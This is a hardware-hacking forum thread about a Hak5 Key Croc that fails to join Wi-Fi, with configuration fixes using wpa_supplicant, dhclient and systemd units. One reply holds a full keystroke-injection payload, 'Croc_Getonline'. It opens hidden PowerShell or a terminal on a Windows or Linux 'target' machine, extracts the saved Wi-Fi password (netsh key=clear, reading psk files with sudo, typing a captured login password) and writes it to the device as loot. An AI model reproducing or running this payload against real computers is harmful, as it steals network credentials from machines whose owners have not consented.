Key croc refuses to connect to Wi-Fi

[alex7272]

Hi guys,

 

I’m  having issues connecting the croc to Wi-Fi, I’ve had many other devices before successfully configured so I know what I am doing however I can’t for the life of me connect the croc to Wi-Fi. The things I have tried:

1. read the hak5 documentation (600999 times)

2. Read forums about people with same issue (none on here seemed to resolve it successfully)

3. Upgraded to latest 1.3 firmware 

4. factory reset 

5. created multiple easier all lowercase networks and passwords to avoid special characters that require escaping 

6. ran ps ax and killed the dhclient wlan0 and the other wlan command (as suggested in another hak5 post) and brought them back up to no avail

7. I have checked the wpa supplicant conf file and it is showing the correct information 

8. I have saved the config file with notepad++ with line endings set to Unix and also saved as a nano in root directory to make sure no funny line endings

9. tried it on someone else’s complete different network

10. I’ve tested different payloads and they are being executed as expected (except the payloads that grab ip info they show blank lines)

11. downgraded to a 1.2 firmware - didn’t fix it either 

I’ve spent about 2 days trying to get this working which it literally is a brand new device out of box I’ve watched the hak5 demo videos seems like a very easy device to configure but highly misleading which is a bit of a let down. I rarely ever post on forums like this, only posting cause I am completely out of options and no documentation or forums found have helped as it seems this issue is quite common but no fixes. 
 

any assistance would be greatly appreciated!! Thank you!! 

[dark_pyrro]

I guess the networks you have tested weren't all hidden networks, or? If you try to connect to hidden network, you have to add a line to the wpa_supplicant.conf file. Also (but that's pretty obvious), you have to connect to a 2.4 GHz network/AP.

[alex7272]

none of the networks i tested were hidden networks, also all networks tested were 2.4 GHz. I am using my home router for this. Does the router need to be in AP mode, its just in router mode (not sure if this makes any difference - grasping at straws now)

[spywill]

Try these payloads and see if they help you to connect to a wifi access point.

This payload just edit in your SSID name and password and then add payload to keycroc payload folder reboot keycroc and then type in match word (mywifi) led will turn green keycroc should be connected to wifi access point.

May want to delete the config file off your keycroc first just in case its corrupted in some way don't worry the keycroc will generate a new config file on next boot.

 

# Title:         WIFI-SETUP
# Description:   Connect to access point quickly by match word add ssid and passwd
# Author:        spywill
# Version:       1.4
# Category:      Key Croc

MATCH mywifi

SSID_NAME=ADD_SSID_NAME_HERE
SSID_PASSWD=ADD_PASSWORD_HERE

LED SETUP
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID $SSID_NAME\nWIFI_PASS $SSID_PASSWD\nSSH ENABLE' /root/udisk/config.txt
sleep 1

PID_WPA=$(pidof wpa_supplicant)
PID_DHC=$(pidof dhclient)
ifconfig wlan0 down
echo -ne "network={\n\tssid=\"$SSID_NAME\"\n\tpsk=\"$SSID_PASSWD\"\n\tpriority=1\n}" > /etc/wpa_supplicant.conf
kill -9 $PID_WPA && kill -9 $PID_DHC
sleep 2
ifconfig wlan0 up
sleep 2
wpa_supplicant -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf -B && dhclient wlan0
sleep 5
systemctl restart ssh.service
sleep 1

if : >/dev/tcp/8.8.8.8/53; then
	LED FINISH
else
	LED R
fi
sleep 3
LED OFF

 

This payload just add to keycroc payload folder reboot keycroc and then type in match word

getonline_W <-- MATCH word for windows
getonline_L <-- MATCH word for Linux
getonline_R <-- MATCH word for Raspberry pi

then led will turn green keycroc should be connected to wifi access point.

 

# Title:           Croc_Getonline
# Description:     Attempt to connect Keycroc automatically to target wifi access point
#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author:          spywill
# Version:         3.5
# Category:        Key Croc
# Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro

MATCH (getonline_W|getonline_R|getonline_L)

CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done

wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt

if [ -f $wifi_pass ]; then
	cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
	rm -f $wifi_pass
fi

ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK

case $LOOT in
	getonline_W)
		Q GUI r
		Q DELAY 3000
		Q STRING "powershell -NoP -NonI -W Hidden"
		Q ENTER
		Q DELAY 5000
		Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
		Q ENTER
		Q DELAY 3000
		Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
		Q ENTER
		Q DELAY 2000
		Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
		Q ENTER
		Q DELAY 2000
		Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
		Q ENTER
		Q DELAY 5000
		Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
		Q ENTER
;;
	getonline_R)
		Q CONTROL-ALT-d
		Q CONTROL-ALT-t
		Q DELAY 2000
		Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
		Q ENTER
		Q DELAY 2000
		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
		Q ENTER
		Q DELAY 2000
		Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
		Q ENTER
		Q DELAY 2000
		Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 3000
		Q STRING "umount \$MOUNT_POINT ; exit"
		Q ENTER
;;
	getonline_L)
		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
		else
			PC_PW=LINUX
		fi
		Q CONTROL-ALT-d
		Q ALT-t
		Q DELAY 2000
		Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
		Q ENTER
		Q DELAY 2000
		Q STRING "$PC_PW"
		Q ENTER
		Q DELAY 2000
		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
		Q ENTER
		Q DELAY 2000
		Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
		Q ENTER
		Q DELAY 2000
		Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 3000
		Q STRING "sudo umount \$MOUNT_POINT ; exit"
		Q ENTER
;;
esac

ATTACKMODE HID
sleep 3

LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
ifconfig wlan0 down

if [ "$LOOT" = "getonline_W" ]; then
	sed -i '0,/./s/^.//' $wifi_pass
	sed -i 's/\r//g' $wifi_pass
fi

sed -i 's/\( \)*/\1/g' $wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
sleep 3
systemctl restart ssh.service

[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
sleep 3
LED OFF

 

Edited March 14, 2023 by spywill

[bhphilos]

Hi spywill

I^m having the same issues like alex7272.

 

I'v tried your payloads but still no luck!

[dark_pyrro]

Is your PSK containing special characters that you have escaped using \ ?

[spywill]

Sometimes I find myself having a hard time running payloads because of my Numlock stat on my keyboard, for some reason after a reboot of my pc my keyboard Numlock stat will be off and my payloads will fail to execute in this stat it will not quack any numbers, I press the Numlock key to turn it to on stat and then run the payload and then payload execute. i'm not sure if this will fix the issue

[catx0rr]

this one worked for me. I tried most of the things to connect the croc to wifi, but to no avail. Connect to the serial console then create a file:

wpa_passphrase 'SSID_NAME' 'SSID_PASSPRHASE' > /etc/wpa_supplicant/wpa_supplicant.conf

And connect to the wifi using this :

wpa_supplicant -B -c /etc/wpa_supplicant/wpa_supplicant.conf -i wlan0

 

To get IP address i requested to the DHCP server:

dhclient wlan0

 

Note that you might want to create a persistent service, if you want the croc to reconnect even after reboot.

/etc/systemd/system/wpa_supplicant.service

```

[Unit]
Description=WPA supplicant

[Service]
Type=dbus
BusName=fi.epitest.hostap.WPASupplicant
ExecStart=/sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant/wpa_supplicant.conf -i wlan0
Restart=always

[Install]
WantedBy=default.target

```

and a DHCP service.

```

[Unit]
Description= DHCP Client
Before=network.target

[Service]
Type=forking
ExecStart=/sbin/dhclient wlan0 -v
ExecStop=/sbin/dhclient wlan0 -r
Restart=always

[Install]
WantedBy=default.target

```

Enable services:

systemctl enable wpa_supplicant.service dhcp.service

systemctl start wpa_supplicant.service dhcp.service

 

Hope this helps, since this resolves my issue..

Edited October 7, 2023 by catx0rr